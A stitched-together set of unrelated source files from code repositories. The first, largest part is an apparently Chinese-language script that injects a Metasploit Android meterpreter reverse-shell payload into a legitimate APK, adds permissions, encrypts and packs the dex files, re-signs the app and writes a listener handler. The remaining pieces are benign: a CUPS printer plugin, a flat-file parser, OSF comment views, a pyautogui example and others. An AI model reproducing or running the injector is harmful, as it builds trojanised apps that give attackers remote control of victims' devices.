AndroidManifestOption = f'-an {SteadyLauncherActivity} -md app_name:{AppLauncherActivity} '
for UsesPermission in OPTIONS['UsesPermission']:
AndroidManifestOption += f'-up {UsesPermission} '
Print.PrintStatus(
f'正在注入msf权限和壳信息到AndroidManifest.xml中...',
Jar.ManifestEditor,
androidmanifestfile=AndroidManifestPath,
newandroidmanifestfile=NewAndroidManifestPath,
xmloptionscommand=AndroidManifestOption
)
Print.PrintDirTree(TestDirDexFile, 3)
Print.PrintSuccess(f'成功将msf权限和壳信息注入App的AndroidManifest.xml,生成新文件`{NewAndroidManifestPath}`文件.')
def RestoreApp():
Print.PrintInfo(f'准备编译还原App的smali文件为dex文件...')
Jar = JarCommand(OPTIONS)
for _ in os.listdir(TestDirAppUnSmaliPath):
AppSmaliPath = ReslovePath(TestDirAppUnSmaliPath, _)
AppDexFile = ReslovePath(TestDirAppUnSmaliPath, f'{_}.dex')
if os.path.isdir(AppSmaliPath):
Print.PrintStatus(
f'正在编译还原{_}为dex文件...',
Jar.Smail2Dex,
dexfilepath=AppDexFile,
smalidirpath=AppSmaliPath
)
Print.PrintDirTree(TestDirDexFile, 3)
Print.PrintSuccess(f'编译还原App的smali文件为dex文件成功,保存在`{TestDirAppUnSmaliPath}`')
def EnCryptDexFile():
Print.PrintInfo(f'准备对新生成的dex文件进行加壳...')
Cryptor = EncryptFile(OPTIONS)
for _ in os.listdir(TestDirAppUnSmaliPath):
AppDexFile = ReslovePath(TestDirAppUnSmaliPath, _)
if os.path.isfile(AppDexFile):
Print.PrintStatus(
f'正在对{_}文件进行加壳...',
Cryptor.EnCryptDexFile,
olddexfile=AppDexFile,
newdexfile=f'{AppDexFile}.EnCrypt'
)
Print.PrintDirTree(TestDirDexFile, 3)
Print.PrintSuccess(f'对新生成的dex文件进行加壳成功,保存在`{TestDirAppUnSmaliPath}`')
def CopyDexJniFile():
Print.PrintInfo(f'准备复制加密后的dex文件和注入后的AndroidManifest.xml到App目录...')
InjectAndroidManifestPath = ReslovePath(TestDirUnZipXmlPath, 'NewAndroidManifest.xml')
AppAndroidManifestPath = ReslovePath(TestDirUnZipApkPath, 'AndroidManifest.xml')
copyfile(InjectAndroidManifestPath, AppAndroidManifestPath)
for _ in os.listdir(TestDirAppUnSmaliPath):
AppDexFile :str = ReslovePath(TestDirAppUnSmaliPath, _)
if AppDexFile.endswith('.EnCrypt') :
DexName :str = os.path.basename(AppDexFile).split('.')[0]
ReSearch = re.search(r'classes(\d)', DexName)
if ReSearch:
NewNum = int(ReSearch[1]) + 1
NewDexFile = ReslovePath(TestDirUnZipApkPath, f'classes{NewNum}.dex')
else:
NewDexFile = ReslovePath(TestDirUnZipApkPath, f'classes2.dex')
copyfile(AppDexFile, NewDexFile)
Print.PrintStatus(
f'正在复制加密后的dex文件和注入后的AndroidManifest.xml到App目录...',
AddSleep
)
Print.PrintDirTree(TestDirUnZipApkPath, 2)
Print.PrintSuccess(f'复制加密后的dex文件和注入后的AndroidManifest.xml到App目录成功,保存在`{TestDirUnZipApkPath}`')
Print.PrintInfo(f'准备复制steady的壳文件到App目录...')
CopyAppDexFile = ReslovePath(TestDirUnZipApkPath, 'classes.dex')
CopyAppLibTmpPath = ReslovePath(TestDirApkFile, 'lib_tmp')
CopyAppLibPath = ReslovePath(TestDirUnZipApkPath, 'lib')
AppArmeabiDir = ReslovePath(CopyAppLibPath, 'armeabi')
AppArmeabiV7aDir = ReslovePath(CopyAppLibPath, 'armeabi-v7a')
AppArm64V8aDir = ReslovePath(CopyAppLibPath, 'arm64-v8a')
AppArmX86Dir = ReslovePath(CopyAppLibPath, 'x86')
AppArmX64Dir = ReslovePath(CopyAppLibPath, 'x86_64')
CopyTree(SteadyLibFile, CopyAppLibTmpPath)
copyfile(SteadyDexFile, CopyAppDexFile)
for _ in '1':
if os.path.exists(AppArm64V8aDir):
continue
elif os.path.exists(AppArmeabiV7aDir):
rmtree(ReslovePath(CopyAppLibTmpPath, 'arm64-v8a'))
continue
elif os.path.exists(AppArmeabiDir):
rmtree(ReslovePath(CopyAppLibTmpPath, 'armeabi-v7a'))
CopyTree(AppArmeabiDir, ReslovePath(CopyAppLibTmpPath, 'arm64-v8a'))
for _ in '1':
if os.path.exists(AppArmX64Dir):
continue
elif os.path.exists(AppArmX86Dir):
rmtree(ReslovePath(CopyAppLibTmpPath, 'x86_64'))
CopyTree(CopyAppLibTmpPath, CopyAppLibPath)
Print.PrintStatus(
f'正在复制steady的壳文件到App目录...',
AddSleep
)
Print.PrintDirTree(CopyAppLibPath, 2)
Print.PrintSuccess(f'复制steady的壳文件到App目录成功,保存在`{CopyAppLibPath}`')
def ZipNewApkFile():
Print.PrintInfo(f'准备打包注入完成的Apk文件...')
Zip = ZipApkFile(ZipFinishApk, 'w', OPTIONS)
Print.PrintStatus(
f'正在打包注入完成的Apk文件...',
Zip.ZipApk
)
Print.PrintDirTree(TestDir, 3)
Print.PrintSuccess(f'打包注入完成的Apk文件成功,保存在`{ZipFinishApk}`')
def ApkSigner():
Print.PrintInfo(f'准备对打包的Apk文件进行签名...')
Jar = JarCommand(OPTIONS)
Print.PrintStatus(
f'正在对打包的{ZipFinishApk}文件进行签名...',
Jar.ApkSigner,
apkfilepath=ZipFinishApk
)
Print.PrintDirTree(TestDir, 3)
Print.PrintSuccess(f'对打包的Apk文件进行签名成功,保存在`{ZipFinishApk}`')
def CreateMsfHandler():
if MsfPayload in ['android/meterpreter/reverse_http', 'android/meterpreter/reverse_https']:
MsfPayloadType = MsfPayload
else:
MsfPayloadType = 'android/meterpreter/reverse_tcp'
with open(MsfHandler,"w") as handler:
handler.write("use exploit/multi/handler\n")
handler.write(f"set payload {MsfPayloadType}\n")
handler.write(f'set AutoLoadStdapi true\n')
handler.write("set LHOST 0.0.0.0\n")
handler.write(f"set LPORT {MsfLPort}\n")
handler.write("set exitonsession false\n")
handler.write("exploit -j")
def EncryptNotInjectMsfCopy():
Print.PrintInfo(f'准备复制App的dex文件到UnSmali目录...')
for _ in os.listdir(TestDirUnZipApkPath):
AppDexFile :str = ReslovePath(TestDirUnZipApkPath, _)
if AppDexFile.endswith('.dex') :
NewDexFile = ReslovePath(TestDirAppUnSmaliPath, _)
copyfile(AppDexFile, NewDexFile)
Print.PrintStatus(
f'正在复制App的dex文件到UnSmali目录...',
AddSleep
)
Print.PrintDirTree(TestDirDexFile, 2)
Print.PrintSuccess(f'复制App的dex文件到UnSmali目录成功,保存在`{TestDirAppUnSmaliPath}`')
def EncryptNotInjectMsf():
Print.PrintRule('开始进行准备工作...', 'green bold')
Print.PrintSuccess(f'获取到需要进行加固的app程序!')
MkTestDir()
UnzipApk(InjectNormalApk)
DecodeAndroidManifest()
EncryptNotInjectMsfCopy()
Print.PrintSuccess(f'准备工作已完成!\n')
Print.PrintRule('开始进行加固工作...', 'blue bold')
EditorAndroidManifest()
EnCryptDexFile()
CopyDexJniFile()
Print.PrintSuccess(f'加固工作已完成!\n')
Print.PrintRule('开始进行结尾工作...', 'red bold')
ZipNewApkFile()
ApkSigner()
Print.PrintRule(f'所有工作已完成! ')
print('')
Print.PrintError(f'生成的Apk在: {ZipFinishApk}')
def InjectMsfNotEncryptCopy():
Print.PrintInfo(f'准备复制App的dex文件到Unzip目录...')
for _ in os.listdir(TestDirAppUnSmaliPath):
AppDexFile :str = ReslovePath(TestDirAppUnSmaliPath, _)
if AppDexFile.endswith('.dex') :
NewDexFile = ReslovePath(TestDirUnZipApkPath, _)
copyfile(AppDexFile, NewDexFile)
Print.PrintStatus(
f'正在复制App的dex文件到Unzip目录...',
AddSleep
)
Print.PrintDirTree(TestDirUnZipApkPath, 2)
Print.PrintSuccess(f'复制App的dex文件到Unzip目录成功,保存在`{TestDirUnZipApkPath}`')
def InjectMsfNotEncrypt():
Print.PrintRule('开始进行准备工作...', 'green bold')
Print.PrintSuccess(f'获取到需要进行注入的app程序!')
MkTestDir()
UnzipApk(InjectNormalApk)
CreateMsf()
DecodeAndroidManifest()
Print.PrintSuccess(f'准备工作已完成!')
Print.PrintRule('开始进行注入工作...', 'blue bold')
BakSmaliDexFile()
InjectMsf2Apk()
RestoreApp()
InjectMsfNotEncryptCopy()
Print.PrintSuccess(f'注入工作已完成!\n')
Print.PrintRule('开始进行结尾工作...', 'red bold')
ZipNewApkFile()
ApkSigner()
Print.PrintRule(f'所有工作已完成! ')
print('')
Print.PrintError(f'生成的远控Apk在: {ZipFinishApk}')
Print.PrintError(f'生成的Msf Handler在: {MsfHandler}')
def InjectAndEncrypt():
Print.PrintRule('开始进行准备工作...', 'green bold')
Print.PrintSuccess(f'获取到需要进行注入的app程序!')
MkTestDir()
UnzipApk(InjectNormalApk)
CreateMsf()
DecodeAndroidManifest()
Print.PrintSuccess(f'准备工作已完成!')
Print.PrintRule('开始进行注入工作...', 'blue bold')
BakSmaliDexFile()
InjectMsf2Apk()
EditorAndroidManifest()
RestoreApp()
EnCryptDexFile()
CopyDexJniFile()
Print.PrintSuccess(f'注入工作已完成!')
Print.PrintRule('开始进行结尾工作...', 'red bold')
ZipNewApkFile()
ApkSigner()
Print.PrintRule(f'所有工作已完成! ')
print('')
Print.PrintError(f'生成的远控Apk在: {ZipFinishApk}')
Print.PrintError(f'生成的Msf Handler在: {MsfHandler}')
if __name__ == '__main__':
sys.excepthook = MyExceptHook
Print = CustomPrint()
Print.PrintLogo(LOGO)
Arguments = GetArguments()
InjectNormalApk = Arguments.normalapk
MsfPayload = Arguments.payload.strip()
MsfLHost = Arguments.lhost.strip()
MsfLPort = Arguments.lport.strip()
if not os.path.exists(InjectNormalApk):
Print.PrintError(f"[需要注入的apk文件不存在,请检查`-n/--normal-apk`参数!\n")
ExitScript()
InjectNormalApk = ReslovePath(InjectNormalApk)
TestDir = ReslovePath(OPTIONS['TestDir'])
TestDirApkFile = ReslovePath(OPTIONS['TestDirApkFile'])
TestDirDexFile = ReslovePath(OPTIONS['TestDirDexFile'])
TestDirUnZipApkPath = ReslovePath(OPTIONS['TestDirUnZipApkPath'])
TestDirAppUnSmaliPath = ReslovePath(OPTIONS['TestDirAppUnSmaliPath'])
TestDirMsfUnSmaliPath = ReslovePath(OPTIONS['TestDirMsfUnSmaliPath'])
TestDirUnZipXmlPath = ReslovePath(OPTIONS['TestDirUnZipXmlPath'])
MsfBuildDexFile = ReslovePath(OPTIONS["MsfBuildDexFile"])
UsesPermission = OPTIONS['UsesPermission']
SteadyLauncherActivity = OPTIONS['SteadyLauncherActivity']
SteadyDexFile = ReslovePath(OPTIONS['SteadyDexFile'])
SteadyLibFile = ReslovePath(OPTIONS['SteadyLibFile'])
ZipFinishApk = ReslovePath(OPTIONS['ZipFinishApk'])
MsfHandler = ReslovePath(OPTIONS['MsfHandler'])
JavaCommand = OPTIONS['JavaPath']
if os.path.exists(JavaCommand):
JavaCommand = 'java'
Print.PrintStatus(
f'正在检查环境信息...',
CheckEnv
)
Mode = Arguments.mode.strip()
if Mode == '1':
Print.PrintInfo(f'你选择了模式1, 对App注入Msf并加固...')
Print.PrintInfo(f'你选择Payload类型为`{MsfPayload}`...')
InjectAndEncrypt()
elif Mode == '2':
Print.PrintInfo(f'你选择了模式2, 仅注入Msf到App中...')
Print.PrintInfo(f'你选择Payload类型为`{MsfPayload}`...')
InjectMsfNotEncrypt()
elif Mode == '3':
Print.PrintInfo(f'你选择了模式3, 仅加固App...')
EncryptNotInjectMsf()
ExitScript()
|
data/flatfileparser.py
|
MonashTS/lbimproved
| 101 |
88205
|
def readFlat(filename, delimiter):
f = open(filename)
ans = []
for line in f:
ans.append(map(lambda x:float(x), filter(lambda x:len(x)>0,line.split(delimiter))))
return ans
|
platypush/plugins/printer/cups.py
|
RichardChiang/platypush
| 228 |
88207
|
<filename>platypush/plugins/printer/cups.py
import os
from typing import Optional, Dict, Any, List
from platypush.message.response.printer.cups import PrinterResponse, PrintersResponse, PrinterJobAddedResponse
from platypush.plugins import Plugin, action
class PrinterCupsPlugin(Plugin):
"""
A plugin to interact with a CUPS printer server.
Requires:
- **pycups** (``pip install pycups``)
"""
def __init__(self, host: str = 'localhost', printer: Optional[str] = None, **kwargs):
"""
:param host: CUPS host IP/name (default: localhost).
:param printer: Default printer name that should be used.
"""
super().__init__(**kwargs)
self.host = host
self.printer = printer
def _get_connection(self, host: Optional[str] = None):
# noinspection PyPackageRequirements
import cups
connection = cups.Connection(host=host or self.host)
return connection
def _get_printer(self, printer: Optional[str] = None):
printer = printer or self.printer
assert printer, 'No printer specified nor default printer configured'
return printer
@action
def get_printers(self, host: Optional[str] = None) -> PrintersResponse:
"""
Get the list of printers registered on a CUPS server.
:param host: CUPS server host IP/name (default: default configured ``host``).
:return: :class:`platypush.message.response.printer.cups.PrintersResponse`, as a name -> attributes dict.
"""
conn = self._get_connection(host)
return PrintersResponse(printers=[
PrinterResponse(
name=name,
printer_type=printer.get('printer-type'),
info=printer.get('printer-info'),
uri=printer.get('device-uri'),
state=printer.get('printer-state'),
is_shared=printer.get('printer-is-shared'),
state_message=printer.get('printer-state-message'),
state_reasons=printer.get('printer-state-reasons', []),
location=printer.get('printer-location'),
uri_supported=printer.get('printer-uri-supported'),
make_and_model=printer.get('printer-make-and-model'),
)
for name, printer in conn.getPrinters().items()
])
@action
def print_test_page(self, printer: Optional[str] = None, host: Optional[str] = None) -> PrinterJobAddedResponse:
"""
Print the CUPS test page.
:param printer: Printer name (default: default configured ``printer``).
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
printer = self._get_printer(printer)
job_id = conn.printTestPage(printer)
return PrinterJobAddedResponse(printer=printer, job_id=job_id)
@action
def print_file(self,
filename: str,
printer: Optional[str] = None,
host: Optional[str] = None,
title: Optional[str] = None,
options: Optional[Dict[str, Any]] = None) -> PrinterJobAddedResponse:
"""
Print a file.
:param filename: Path to the file to print.
:param printer: Printer name (default: default configured ``printer``).
:param host: CUPS server IP/name (default: default configured ``host``).
:param title: Print title.
:param options: Extra CUPS name->value options.
"""
filename = os.path.abspath(os.path.expanduser(filename))
conn = self._get_connection(host)
printer = self._get_printer(printer)
job_id = conn.printFile(printer, filename=filename, title=title or '', options=options or {})
return PrinterJobAddedResponse(printer=printer, job_id=job_id)
@action
def print_files(self,
filenames: List[str],
printer: Optional[str] = None,
host: Optional[str] = None,
title: Optional[str] = None,
options: Optional[Dict[str, Any]] = None) -> PrinterJobAddedResponse:
"""
Print a list of files.
:param filenames: Paths to the files to print.
:param printer: Printer name (default: default configured ``printer``).
:param host: CUPS server IP/name (default: default configured ``host``).
:param title: Print title.
:param options: Extra CUPS name->value options.
"""
filenames = [os.path.abspath(os.path.expanduser(f)) for f in filenames]
conn = self._get_connection(host)
printer = self._get_printer(printer)
job_id = conn.printFiles(printer, filenames=filenames, title=title or '', options=options or {})
return PrinterJobAddedResponse(printer=printer, job_id=job_id)
@action
def add_printer(self,
name: str,
ppd_file: str,
info: str,
location: Optional[str] = None,
host: Optional[str] = None):
"""
Add a printer.
:param name: Printer name - alphanumeric + underscore characters only.
:param ppd_file: Path to the PPD file with the printer information and configuration.
:param host: CUPS server IP/name (default: default configured ``host``).
:param info: Human-readable information about the printer.
:param location: Human-readable printer location info.
"""
conn = self._get_connection(host)
ppd_file = os.path.abspath(os.path.expanduser(ppd_file))
# noinspection PyArgumentList
conn.addPrinter(name=name, filename=ppd_file, info=info, location=location)
@action
def delete_printer(self, printer: str, host: Optional[str] = None):
"""
Delete a printer from a CUPS server.
:param printer: Printer name.
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
conn.deletePrinter(printer)
@action
def enable_printer(self, printer: Optional[str], host: Optional[str] = None):
"""
Enable a printer on a CUPS server.
:param printer: Printer name.
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
printer = self._get_printer(printer)
conn.enablePrinter(printer)
@action
def disable_printer(self, printer: Optional[str] = None, host: Optional[str] = None):
"""
Disable a printer on a CUPS server.
:param printer: Printer name.
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
printer = self._get_printer(printer)
conn.disablePrinter(printer)
@action
def get_jobs(self, host: Optional[str] = None) -> Dict[int, Dict[str, Any]]:
"""
Get the list of active jobs.
:param host: CUPS server IP/name (default: default configured ``host``).
:return: A job_id -> job_info dict.
"""
conn = self._get_connection(host)
return conn.getJobs()
@action
def accept_jobs(self, printer: Optional[str] = None, host: Optional[str] = None):
"""
Start accepting jobs on a printer.
:param printer: Printer name.
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
printer = self._get_printer(printer)
conn.acceptJobs(printer)
@action
def reject_jobs(self, printer: Optional[str] = None, host: Optional[str] = None):
"""
Start rejecting jobs on a printer.
:param printer: Printer name.
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
printer = self._get_printer(printer)
conn.rejectJobs(printer)
@action
def cancel_job(self, job_id: int, purge_job: bool = False, host: Optional[str] = None):
"""
Cancel a printer job.
:param job_id: Job ID to cancel.
:param purge_job: Also remove the job from the server (default: False).
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
conn.cancelJob(job_id, purge_job=purge_job)
@action
def move_job(self,
job_id: int,
source_printer_uri: str,
target_printer_uri: str,
host: Optional[str] = None):
"""
Move a job to another printer/URI.
:param job_id: Job ID to cancel.
:param source_printer_uri: Source printer URI.
:param target_printer_uri: Target printer URI.
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
conn.moveJob(printer_uri=source_printer_uri, job_id=job_id, job_printer_uri=target_printer_uri)
@action
def finish_document(self, printer: Optional[str] = None, host: Optional[str] = None):
"""
Finish sending a document to a printer.
:param printer: Printer name (default: default configured ``printer``).
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
printer = self._get_printer(printer)
conn.finishDocument(printer)
@action
def add_printer_to_class(self,
printer_class: str,
printer: Optional[str] = None,
host: Optional[str] = None):
"""
Add a printer to a class.
:param printer_class: Class name.
:param printer: Printer name.
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
printer = self._get_printer(printer)
conn.addPrinterToClass(printer, printer_class)
@action
def delete_printer_from_class(self,
printer_class: str,
printer: Optional[str] = None,
host: Optional[str] = None):
"""
Delete a printer from a class.
:param printer_class: Class name.
:param printer: Printer name.
:param host: CUPS server IP/name (default: default configured ``host``).
"""
conn = self._get_connection(host)
printer = self._get_printer(printer)
conn.deletePrinterFromClass(printer, printer_class)
@action
def get_classes(self, host: Optional[str] = None) -> Dict[str, Dict[str, Any]]:
"""
Get the list of classes on a CUPS server.
:param host: CUPS server IP/name (default: default configured ``host``).
:return: dict - class_name -> class_info.
"""
conn = self._get_connection(host)
return conn.getClasses()
# vim:sw=4:ts=4:et:
|
pyautogui__keyboard__examples/input_and_delete__typewrite_press_keyDown_keyUp.py
|
DazEB2/SimplePyScripts
| 117 |
88216
|
<filename>pyautogui__keyboard__examples/input_and_delete__typewrite_press_keyDown_keyUp.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# SOURCE: http://pyautogui.readthedocs.io/en/latest/keyboard.html#the-press-keydown-and-keyup-functions
# pip install pyautogui
import pyautogui
TEXT = 'Hello World!'
# Input text
pyautogui.typewrite(TEXT)
# Select text
pyautogui.keyDown('shift') # Hold down the shift key
for _ in TEXT:
pyautogui.press('left') # Press the left arrow key
pyautogui.keyUp('shift') # Release the shift key
pyautogui.press('delete')
|
pretrain/modules/__init__.py
|
xiling42/VL-BERT
| 671 |
88260
|
<reponame>xiling42/VL-BERT
from .resnet_vlbert_for_pretraining import ResNetVLBERTForPretraining
from .resnet_vlbert_for_pretraining_multitask import ResNetVLBERTForPretrainingMultitask
from .resnet_vlbert_for_attention_vis import ResNetVLBERTForAttentionVis
|
website/project/views/comment.py
|
gaybro8777/osf.io
| 628 |
88267
|
# -*- coding: utf-8 -*-
import markdown
from django.utils import timezone
from flask import request
from api.caching.tasks import ban_url
from osf.models import Guid
from framework.postcommit_tasks.handlers import enqueue_postcommit_task
from website import settings
from addons.base.signals import file_updated
from osf.models import BaseFileNode, TrashedFileNode
from osf.models import Comment
from website.notifications.constants import PROVIDERS
from website.notifications.emails import notify, notify_mentions
from website.project.decorators import must_be_contributor_or_public
from osf.models import Node
from website.project.signals import comment_added, mention_added
@file_updated.connect
def update_file_guid_referent(self, target, event_type, payload, user=None):
if event_type not in ('addon_file_moved', 'addon_file_renamed'):
return # Nothing to do
source, destination = payload['source'], payload['destination']
source_node, destination_node = Node.load(source['node']['_id']), Node.load(destination['node']['_id'])
if source['provider'] in settings.ADDONS_BASED_ON_IDS:
if event_type == 'addon_file_renamed':
return # Node has not changed and provider has not changed
# Must be a move
if source['provider'] == destination['provider'] and source_node == destination_node:
return # Node has not changed and provider has not changed
file_guids = BaseFileNode.resolve_class(source['provider'], BaseFileNode.ANY).get_file_guids(
materialized_path=source['materialized'] if source['provider'] != 'osfstorage' else source['path'],
provider=source['provider'],
target=source_node
)
for guid in file_guids:
obj = Guid.load(guid)
if source_node != destination_node and Comment.objects.filter(root_target___id=guid).count() != 0:
update_comment_node(guid, source_node, destination_node)
if source['provider'] != destination['provider'] or source['provider'] != 'osfstorage':
old_file = BaseFileNode.load(obj.referent._id)
obj.referent = create_new_file(obj, source, destination, destination_node)
obj.save()
if old_file and not TrashedFileNode.load(old_file._id):
old_file.delete()
def create_new_file(obj, source, destination, destination_node):
# TODO: Remove when materialized paths are fixed in the payload returned from waterbutler
if not source['materialized'].startswith('/'):
source['materialized'] = '/' + source['materialized']
if not destination['materialized'].startswith('/'):
destination['materialized'] = '/' + destination['materialized']
if not source['path'].endswith('/'):
data = dict(destination)
new_file = BaseFileNode.resolve_class(destination['provider'], BaseFileNode.FILE).get_or_create(destination_node, destination['path'])
if destination['provider'] != 'osfstorage':
new_file.update(revision=None, data=data)
else:
new_file = find_and_create_file_from_metadata(destination.get('children', []), source, destination, destination_node, obj)
if not new_file:
if source['provider'] == 'box':
new_path = obj.referent.path
else:
new_path = obj.referent.materialized_path.replace(source['materialized'], destination['materialized'])
new_file = BaseFileNode.resolve_class(destination['provider'], BaseFileNode.FILE).get_or_create(destination_node, new_path)
new_file.name = new_path.split('/')[-1]
new_file.materialized_path = new_path
new_file.save()
return new_file
def find_and_create_file_from_metadata(children, source, destination, destination_node, obj):
""" Given a Guid obj, recursively search for the metadata of its referent (a file obj)
in the waterbutler response. If found, create a new addon BaseFileNode with that metadata
and return the new file.
"""
for item in children:
# TODO: Remove when materialized paths are fixed in the payload returned from waterbutler
if not item['materialized'].startswith('/'):
item['materialized'] = '/' + item['materialized']
if item['kind'] == 'folder':
return find_and_create_file_from_metadata(item.get('children', []), source, destination, destination_node, obj)
elif item['kind'] == 'file' and item['materialized'].replace(destination['materialized'], source['materialized']) == obj.referent.materialized_path:
data = dict(item)
new_file = BaseFileNode.resolve_class(destination['provider'], BaseFileNode.FILE).get_or_create(destination_node, item['path'])
if destination['provider'] != 'osfstorage':
new_file.update(revision=None, data=data)
return new_file
def update_comment_node(root_target_id, source_node, destination_node):
Comment.objects.filter(root_target___id=root_target_id).update(node=destination_node)
source_node.save()
destination_node.save()
def render_email_markdown(content):
return markdown.markdown(content, ['del_ins', 'markdown.extensions.tables', 'markdown.extensions.fenced_code'])
@comment_added.connect
def send_comment_added_notification(comment, auth, new_mentions=None):
if not new_mentions:
new_mentions = []
node = comment.node
target = comment.target
context = dict(
profile_image_url=auth.user.profile_image_url(),
content=render_email_markdown(comment.content),
page_type=comment.get_comment_page_type(),
page_title=comment.get_comment_page_title(),
provider=PROVIDERS[comment.root_target.referent.provider] if comment.page == Comment.FILES else '',
target_user=target.referent.user if is_reply(target) else None,
parent_comment=target.referent.content if is_reply(target) else '',
url=comment.get_comment_page_url(),
exclude=new_mentions,
)
time_now = timezone.now()
sent_subscribers = notify(
event='comments',
user=auth.user,
node=node,
timestamp=time_now,
**context
)
if is_reply(target):
if target.referent.user and target.referent.user._id not in sent_subscribers:
notify(
event='global_comment_replies',
user=auth.user,
node=node,
timestamp=time_now,
**context
)
@mention_added.connect
def send_mention_added_notification(comment, new_mentions, auth):
node = comment.node
target = comment.target
context = dict(
profile_image_url=auth.user.profile_image_url(),
content=render_email_markdown(comment.content),
page_type='file' if comment.page == Comment.FILES else node.project_or_component,
page_title=comment.root_target.referent.name if comment.page == Comment.FILES else '',
provider=PROVIDERS[comment.root_target.referent.provider] if comment.page == Comment.FILES else '',
target_user=target.referent.user if is_reply(target) else None,
parent_comment=target.referent.content if is_reply(target) else '',
new_mentions=new_mentions,
url=comment.get_comment_page_url()
)
time_now = timezone.now()
notify_mentions(
event='global_mentions',
user=auth.user,
node=node,
timestamp=time_now,
**context
)
def is_reply(target):
return isinstance(target.referent, Comment)
def _update_comments_timestamp(auth, node, page=Comment.OVERVIEW, root_id=None):
if node.is_contributor_or_group_member(auth.user):
enqueue_postcommit_task(ban_url, (node, ), {}, celery=False, once_per_request=True)
if root_id is not None:
guid_obj = Guid.load(root_id)
if guid_obj is not None:
# FIXME: Doesn't work because we're not using Vanish anymore
# enqueue_postcommit_task(ban_url, (self.get_node(),), {}, celery=False, once_per_request=True)
pass
# update node timestamp
if page == Comment.OVERVIEW:
root_id = node._id
auth.user.comments_viewed_timestamp[root_id] = timezone.now()
auth.user.save()
return {root_id: auth.user.comments_viewed_timestamp[root_id].isoformat()}
else:
return {}
@must_be_contributor_or_public
def update_comments_timestamp(auth, node, **kwargs):
timestamp_info = request.get_json()
page = timestamp_info.get('page')
root_id = timestamp_info.get('rootId')
return _update_comments_timestamp(auth, node, page, root_id)
|
RePoE/parser/modules/cluster_jewels.py
|
brather1ng/RePoE
| 224 |
88309
|
from RePoE.parser.util import call_with_default_args, write_json
from RePoE.parser import Parser_Module
class cluster_jewels(Parser_Module):
@staticmethod
def write(file_system, data_path, relational_reader, translation_file_cache, ot_file_cache):
skills = {}
for row in relational_reader["PassiveTreeExpansionSkills.dat"]:
size = row["PassiveTreeExpansionJewelSizesKey"]["Name"]
if size not in skills:
skills[size] = []
skills[size].append(
{
"id": row["PassiveSkillsKey"]["Id"],
"name": row["PassiveSkillsKey"]["Name"],
"stats": {stat["Id"]: value for stat, value in row["PassiveSkillsKey"]["StatsZip"]},
"tag": row["TagsKey"]["Id"],
}
)
data = {}
for row in relational_reader["PassiveTreeExpansionJewels.dat"]:
size = row["PassiveTreeExpansionJewelSizesKey"]["Name"]
data[row["BaseItemTypesKey"]["Id"]] = {
"name": row["BaseItemTypesKey"]["Name"],
"size": size,
"min_skills": row["MinNodes"],
"max_skills": row["MaxNodes"],
"small_indices": row["SmallIndices"],
"notable_indices": row["NotableIndices"],
"socket_indices": row["SocketIndices"],
"total_indices": row["TotalIndices"],
"passive_skills": skills[size],
}
write_json(data, data_path, "cluster_jewels")
if __name__ == "__main__":
call_with_default_args(cluster_jewels.write)
|
vendor/src/github.com/Workiva/go-datastructures/fibheap/Test Generator/Merge.py
|
ylankgz/amazon-ssm-agent
| 6,943 |
88322
|
import random
l1 = []
l2 = []
for i in range(20):
l1.append(random.uniform(-1E10, 1E10))
l2.append(random.uniform(-1E10, 1E10))
print(l1)
print(l2)
l = []
l.extend(l1)
l.extend(l2)
print(sorted(l))
'''
[6015943293.071386, -3878285748.0708866, 8674121166.062424, -1528465047.6118088,
7584260716.494843, -373958476.80486107, -6367787695.054295, 6813992306.719868,
5986097626.907181, 9011134545.052086, 7123644338.268343, 2646164210.08445,
4407427446.995375, -888196668.2563229, 7973918726.985172, -6529216482.09644,
6079069259.51853, -8415952427.784341, -6859960084.757652, -502409126.89040375]
[9241165993.258648, -9423768405.578083, 3280085607.6687145, -5253703037.682413,
3858507441.2785892, 9896256282.896187, -9439606732.236805, 3082628799.5320206,
9453124863.59945, 9928066165.458393, 1135071669.4712334, 6380353457.986282,
8329064041.853199, 2382910730.445751, -8478491750.445316, 9607469190.690144,
5417691217.440792, -9698248424.421888, -3933774735.280322, -5984555343.381466]
[-9698248424.421888, -9439606732.236805, -9423768405.578083, -8478491750.445316,
-8415952427.784341, -6859960084.757652, -6529216482.09644, -6367787695.054295,
-5984555343.381466, -5253703037.682413, -3933774735.280322, -3878285748.0708866,
-1528465047.6118088, -888196668.2563229, -502409126.89040375,
-373958476.80486107, 1135071669.4712334, 2382910730.445751, 2646164210.08445,
3082628799.5320206, 3280085607.6687145, 3858507441.2785892, 4407427446.995375,
5417691217.440792, 5986097626.907181, 6015943293.071386, 6079069259.51853,
6380353457.986282, 6813992306.719868, 7123644338.268343, 7584260716.494843,
7973918726.985172, 8329064041.853199, 8674121166.062424, 9011134545.052086,
9241165993.258648, 9453124863.59945, 9607469190.690144, 9896256282.896187,
9928066165.458393]
'''
|
cape_webservices/app/app_saved_reply_endpoints.py
|
edwardmjackson/cape-webservices
| 164 |
88341
|
<gh_stars>100-1000
# Copyright 2018 BLEMUNDSBURY AI LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cape_webservices.app.app_settings import URL_BASE
from cape_webservices.app.app_settings import app_saved_reply_endpoints
from cape_webservices.app.app_middleware import respond_with_json, requires_auth
from cape_document_manager.annotation_store import AnnotationStore
from cape_api_helpers.output import list_response
from cape_api_helpers.input import required_parameter, optional_parameter, list_saved_reply_ids
